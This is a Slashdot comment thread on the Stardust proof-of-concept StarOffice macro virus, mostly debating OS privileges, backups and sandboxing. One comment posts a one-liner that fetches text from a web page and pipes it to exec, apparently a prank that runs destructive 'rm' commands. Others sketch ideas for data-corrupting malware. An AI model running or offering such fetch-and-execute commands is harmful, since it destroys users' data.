First StarOffice Virus Sighted 166
Sam Haine '95 writes "News.com is reporting on the creation of Stardust, a virus which uses macros to attack StarOffice, Sun's office suite. The malware was written as a proof-of-concept code to show what might be possible rather than as a serious attempt to create a new attack vector." From the article: "The pest is written in Star Basic. It downloads an image file with adult content from the Internet and opens that file in a new document, according to Kaspersky's posting."
it's still basically a OS security issue (Score:3, Interesting)
First, a question, I don't know what the default setting for StarOffice is as to macro execution. Is it turned on by default?
Regardless, it's no secret of mystery even if by default macro execution is on in StarOffice, the vulnerability is in the OS infrastructure. If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.
OTOH, while it is getting better in Windows, there are still far too many users set up with admin privileges, and we're a long way from sufficient education and reconfiguration such that a typical Windows user has safe access so exploits succeed in only local impact.
Macros in documents are almost evil, I hate that everything sent somehow has to have its own life-force, but in properly configured systems, they're manageable. (I don't object to macros, I use them all the time, but to make them "required" to get the full effect of e-mail is annoying.)
Re:it's still basically a OS security issue (Score:5, Insightful)
We have this discussion all the time, but once more can't hurt: on single-user Linux systems or Unix workstations, losing $HOME is far more serious than losing system files.
Re:it's still basically a OS security issue (Score:2)
Re:it's still basically a OS security issue (Score:3, Funny)
Not my frozen bubble scores!!!!!!1 (Score:2)
Re:it's still basically a OS security issue (Score:2)
Re:it's still basically a OS security issue (Score:4, Insightful)
But even if you did backup every night, what if some malware corrupted some documents in
Re:it's still basically a OS security issue (Score:2)
2) I keep dailies for a week and monthlies essentially forever, i.e. burned to CD/DVD. Not perfect, but I wouldn't be totally hosed.
Re:it's still basically a OS security issue (Score:2)
99.9% of the time the backup doesn't capture any interesting changes, but you never know.
Losing data is always the real problem. (Score:4, Informative)
It's always about the security of the data.
Which is why part of the OS's job is to restrict the ability of regular users as much as possible.
When all that is in danger is your personal home directory, that's really as good as the OS can be.
If we're talking single user/home machines
Re:Losing data is always the real problem. (Score:2)
No, as GP said, the security of Infomration is more important. If a virus deletes the user's $HOME/Documents files I bet he will be *freaking* pissed after someone in the 1337U8UN7U forum tells him not to worry as the stability of the system is not going to be affected.
Re:Losing data is always the real problem. (Score:2)
Let's say that you and I both get some bit of malware, you on WinXP (where there's a 99.44% chance your accout has Administrator privs), and me on Linux, logged in as "ron", who doesn't has root privs.
How do we recover?
You must reinstall WinXP and every application, then all data. Much time (2 weeknight
Re:it's still basically a OS security issue (Score:2)
It really isn't. Any user who cares about their stuff both should and could back up $HOME every night; it's small, and the delta set is even smaller, so backing up is fast and cheap. Any user who cares about their stuff should, but often cannot, back up / every night, purely do to practical issues.
Moreover, when $HOME gets wiped, you just have to lay your data back down -- call it ten minutes if you do a complete backup nightly to a DVD, or half an h
Re:it's still basically a OS security issue (Score:5, Interesting)
Actually, a complete reinstall on a Linux system is so trivial it doesn't matter -- as long as
I don't, nor do I known anyone that does, back up their
What I found was easy was to create a folder for all the updates I have installed (.tgz in my case, but
I haven't played with it on Slackware, but on Fedora/Red Hat and their derivatives you could create a kickstart disk after your initial install to automate the reinstall. No need to choose timezones, package sets or anything. Very handy.
I would like to point out that this is so damned easy because Linux DOES NOT USE A REGISTRY like Windows, instead saves global configs in
-Charles
Re:it's still basically a OS security issue (Score:2)
I did this more to be able to track a change in code incase something happened. This should
Meet my mother (Score:2, Interesting)
My mom works on a (OS X) Mac (small home office), so far safe as houses as viruses are concerned. Still her machine is backupped (is that actually a word?) on a 7-day-basis, i.e. every day of the week her user-directory is written to a different backup-set on a seperate HD (= 7 different backups, one for each day of the week). Every 3-4 weeks I burn a snapshot of all her data onto DVDs. Why?
It may seem like overkill, but I set t
Re:it's still basically a OS security issue (Score:2, Informative)
Re:it's still basically a OS security issue (Score:2)
More importantly, compared to the mess that we have on windows, it can be trivial to remove spyware. A simple command can do it. For example:
find / -user $ME -perm +x -exec 'rm -i {}
So even though a virus in userland can do serious damage, it is in a more vulnerable pos
Re:it's still basically a OS security issue (Score:2)
I would have to disagree. It is much, much easier to (backup and) recover $HOME with the appropriate precautions than to tune an OS for optimal performance.
On my machine, an automatic, periodic backup is made of $HOME by a cron job to my other disk (which requires root access). With only userland privileges, no virus will be able to get to that backup. Restoring a backup is as simple as a tar xvfz
Re:it's still basically a OS security issue (Score:2)
I've got data so scattered around my hard drive that there's no hope of doing any sort of reasonable backup right now for instance. It's my failing, and some time when I have time I plan to go through and sort stuff out, but right now if I lose my data you might as well toss my computer off the roof.
No, it's not. (Score:2)
Re:it's still basically a OS security issue (Score:2)
I think you're missing the point. Sure, for most users, losing $HOME is as good as losing their entire harddrive. But $HOME can be very easily backed up - some distros can even be setup to do an automatic backup for you. Or, if you're really paranoid, could even run StarOffice with its very own user. The tools to protect i
Re:it's still basically a OS security issue (Score:2)
That depends on what you keep in $HOME.
Personally, I keep my data on separate partition mounted on, say,
Most of what's in my home directory is just stuff I've downloaded and my Gnome/KDE settings, etc. If I lose those, the system will just recreate them. Big deal. So I have to go in and click on a few dia
Re:it's still basically a OS security issue (Score:2)
Once more for this response can't hurt, either: losing one user's $HOME is far less serious than losing every home directory on the box plus the box itself maliciously attacking other parts of the network.
Re:Virus Spreading Problem... (Score:2)
It would be useful to know whether OOo BASIC can get out of the OOo sandbox and access the live system.
Re:it's still basically a OS security issue (Score:3, Interesting)
Regardless, it's no secret of mystery even if by default macro execution is on in StarOffice, the vulnerability is in the OS infrastructure. If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.
I partially agree with you. Most office software on a normal *nix workstation, however, would have sufficie
Re:it's still basically a OS security issue (Score:3, Interesting)
Re:it's still basically a OS security issue (Score:3, Insightful)
Re:it's still basically a OS security issue (Score:3, Insightful)
There's plenty of blame to go around, but it points out a general clue: writing secure generalize
Re:it's still basically a OS security issue (Score:2)
Huge amounts of damage can be done even to the user's sandbox, including disclosure of private information (which isn't the OS's fault, either, if the app is giving its macros access to sockets).
I fault the OS for not giving sufficient granularity of permissions for applications. The user should decide if the program gets access to sockets, and if they are real sockets or virtual ones. It should also have reasonable defaults that let the user decide if their word processor can access the internet or open
Re:it's still basically a OS security issue (Score:2)
Appropriate "sandbox" security model depends on what an application is supposed to be doing; any application that provides a scripting facility ought to provide an appropriate internal security model as well. Arbitrary scripts should not have access to the full range of permissions available to the application running them unless the user has specifically elected to allow that, or unless
Re:it's still basically a OS security issue (Score:2)
Appropriate "sandbox" security model depends on what an application is supposed to be doing
Agreed, but a reasonable default should be applied to any software installed and can be modified to become less restrictive as the user tries to use it for more tasks and approves more uses for it.
Arbitrary scripts should not have access to the full range of permissions available to the application running them unless the user has specifically elected to allow that
I very much agree.
P.S. the blockquote tag is n
Re:it's still basically a OS security issue (Score:5, Insightful)
Re:it's still basically a OS security issue (Score:2)
Flood, fire, virus, crash. Really doesn't matter, gone is gone.
Now whats more dangerous is a virus/script that changes figures and words in documents. Its likely you'll over write your backups and only have corrupt information.
Hmm, here is an idea, only have the virus corrupt data on files that have not been accessed in the last (x) days, 30 to 60 sounds like a good number, by the time most people notice it will be too late.
Re:it's still basically a OS security issue (Score:2)
Sortof. There is a "security" setting in the preferences that is set to "medium" by default meaning that macros will require confirmation before they execute unless they are from a trusted source. No trusted sources are defined by default.
Of course lots of users will agree to pretty much anything the machine asks (the website wants to steal all your money and reformat your disk bef
Re:it's still basically a OS security issue (Score:2)
I wish I could add you to my friends list.
Missing the best part. (Score:3, Funny)
Re:Missing the best part. (Score:2)
goatse (Score:5, Funny)
be careful what you wish for... the 'adult content' could be goatse
Re:Missing the best part. (Score:2)
i thought that free pr0n was a feature
Virus!? (Score:5, Funny)
I don't call that a virus, I call it a feature.
Hopefully the next version will allow you to enter keywords to guide the image downloader.
Re:Virus!? (Score:3, Interesting)
Speaking of features, apparently StarBasic has the ability to download content from the internet, and - get this - StarOffice has the ability to DISPLAY IMAGES.
I knew it was insecure.
Re:Virus!? (Score:2)
Re:Virus!? (Score:4, Funny)
What, no screenshots?
Re:Virus!? (Score:2)
Look! It must be a virus. Oh yeah, Star Office. They don't have viruses, you say? Well, it must be the first one ever.
virus? (Score:5, Funny)
That's no virus, that's a productivity tool!
A Virus (Score:4, Insightful)
No malicious code (Score:3, Insightful)
Re:A Virus (Score:4, Insightful)
An actual virus which utterly cripples Windows PC's is discovered in the wild: Business as usual.
That's pretty much all you need to know about Windows and MS-Office.
Re:A Virus (Score:2)
Re:A Virus (Score:2)
Re:A Virus (Score:2)
Re:A Virus (Score:2)
Re:A Virus (Score:2)
Re:A Virus (Score:3, Interesting)
lynx -dump http://www.justpasha.org/folk/rm.html|sed -n '4p'|awk '{print $1,$2,$3}'|xargs exec
Re:A Virus (Score:2)
what we all want to know... (Score:2)
I doubt this is really going to turn into anything major though, Star still has security through obscurity. MS office is taking all the hits on the macro virus front.
I'm actually fairly pleased that they have done this though, it will make people look further and work to make it even more secure
Learning period (Score:5, Insightful)
It will also require tough and down-to-the-ground tough work such as researching the worms out there and patching the product out.
Another thing is: you can never "fix" the user, there will always be the guys to run attached executables that promise hot porn and FREE MONY!.
Re:Learning period (Score:2, Funny)
Re:Learning period (Score:2)
Not so easy, don't forget that the patches have to be reviewed by some central authrority (like the guys that started the product? dunno), otherwise it'll be just as easy to sneak in a backdoor or a whole tro
Re:Learning period (Score:2, Insightful)
Re:Learning period (Score:2)
$ apt-cache show openoffice.org-writer
Package: openoffice.org-writer
Installed-Size: 10944
Version: 2.0.2-3
Size: 4945590
5 MB download, 10 MB install. Not that painful really.
POC != virus (Score:2, Insightful)
proof of concept is not a virus, sure it could be, but until its in the wild its not really
Why go through the trouble? (Score:4, Interesting)
Where is the "proof" (and the "virus") in this "proof of concept virus"?
Re:Why go through the trouble? (Score:3, Insightful)
Re:Why go through the trouble? (Score:3, Insightful)
The "proof of concept" (Score:2)
Re:Why go through the trouble? (Score:3, Informative)
Bypass mechanism (Score:3, Insightful)
I'm all for protecting users from their own stupidity, but in the end, there's a point where people stop having any power at all.
Re:Bypass mechanism (Score:2)
Running macros in a word-processor document shouldn't (by default) be "all-or-nothing"; they ought to run in a secure sandbox that requires user intervention to perform dangerous tasks like, say, modifying the global template (or, arguably, any external file), even if the user account has permission to run them.
Nice! (Score:2)
Re:Nice! (Score:2)
It is my experience that stuff like this is only spread through "adult images"... they just go to what sells, and evidently on the internet, that's pr0n
Whoosh! (Score:2)
Re:Nice! (Score:2)
Bad terminology. Not a virus. (Score:2)
This so-called virus, therefore, is just a trojan.
Re:Bad terminology. Not a virus. (Score:2)
Re:Bad terminology. Not a virus. (Score:2)
rm -rf
Re:Bad terminology. Not a virus. (Score:2)
Re:Bad terminology. Not a virus. (Score:2)
Any document format with a scripting facility provides the capacity to a script on the client machine when a user opens a document. If that's all it takes to have a "virus", then every macro is a "virus".
Proof of Concept to infect the planet (Score:5, Interesting)
In my theory, a virus creator need create say a corrupted image, sound, etc., and send it through networks as a spoofed source. For example, MSN, AIM, Yahoo! messengers all stream annoying advertisements, so what's to stop someone from creating a packet injection tool to stream a virus through to everyone listening for the multicast and infect their machine.
Let D=Disney A=Attacker M=Multicast_Address DST=Destination... If A spoofs D sending bad data to M's DST... How many machines can possibly get infected. The framework is there and the possible outcome would be mass infections on a worse level then any worm seen. Of course the whole notion is conceptual but I'm sure it can be done.
Anyhow in relation to the article, there is no mention of which operating system this PoC affects but I'm sure it will only be a matter of time before someone creates all sorts of perl, sh, python scripts to try and make Unix zombies or so. Luckily I know of no colo places using StarOffice on big piped networks, so DDoS drones are unlikely to come out of this. Simply infected machines... Will be strange to see what else comes out of this.
Re:Proof of Concept to infect the planet (Score:3, Informative)
The reason this won't work is that multicast is blocked by a large percentage of edge routers. Without widescale use of multicast, your PoC would cause little harm. We don't have widescale use of multicast...as one could figure out from the fact you felt it necessary to include a DEFINITION of multicast in your post...assumin
Re:Proof of Concept to infect the planet (Score:2)
The most important blockage to multicast, according to someone I know who worked at AT&T, is that ISPs don't know how to bill for it.
If you're a customer of AT&T and you send 1 packet into AT&T's network, and it causes 20 packets to leave AT&T's network, AT&T (and other major ISPs) don't have any facilities to bill you for that, and can't even decide if you're
Re:Proof of Concept to infect the planet (Score:2)
Not a lot, since it is NOT A VIRUS. It doesn't infect any system files, nor can it reproduce itself. Read the other comments above.
Erh... no, boss, erh... no, that wasn't me (Score:5, Funny)
A heartfelt THANK YOU to the autor!
Re:Erh... no, boss, erh... no, that wasn't me (Score:2)
Thanks! (Score:3, Funny)
Cool... Thanks for the idea!
Respectfully Signed,
Anonymous Redmond Washington Resident
"Announcement" unconnected to Kapersky's products? (Score:2)
Kapersky has products for Linux file servers and mail servers -- although I cannot find anything beyond a price on their website, so perhaps what they have is a product that checks for Windows viruses but happens to run under Linux.
OpenOffice too! (Score:3, Informative)
Yawn (Score:2, Interesting)
Proof of security (Score:3, Insightful)
Is this really a virus? (Score:4, Insightful)
Re:Is this really a virus? (Score:2)
It doesn't, macros are of the "Trojan" variety. Personally, I think we should call the whole virus/worm/trojan category "Internet Transmitted Diseases", or ITDs for short, so that they're scarier to the non-tech crowd.
Re:Is this really a virus? (Score:2)
hm.. (Score:2, Informative)
Just because all it does is download porn, doesnt mean that it couldnt download a shell script that wipes out the MBR on your hard disk.
Re:hm.. (Score:2)
OTOH, it also doesn't demonstrate that it could download such a shell script and cause it to be executed without user intervention.
So its not really a "proof of concept" as regards that particularly capacity at all. The fact that it doesn't show that you can't do it is meaningless, that tells you nothing you didn't know without the so-called "proof of concept".
Re:hm.. (Score:2)
No need to worry (Score:5, Funny)
Re:No need to worry (Score:2)
"To both users of Open Office. I'll bet they're shaking in their boots!"
sootman (158191) on Thursday June 01, @05:59PM - Modded +5 funny:
"Both StarOffice users have been contacted and were warned to be careful."
Which just goes to prove (Score:2)
That publishing or distributing information in *any* 'word processor' format is just silly. The only time you should send or accept a 'word processor' format file from anyone is when you are specifically collabortating with that person to co-produce that document, and you have agreed in advance to use that specific format.
And even then it would make sense to use plain text to collaborate on the *content* of the document, and then have one person do the 'typesetting' in an appropriate application once the co
Re:Which just goes to prove (Score:2)
Good luck convincing people to give up Word for TeX, sensible as your idea is.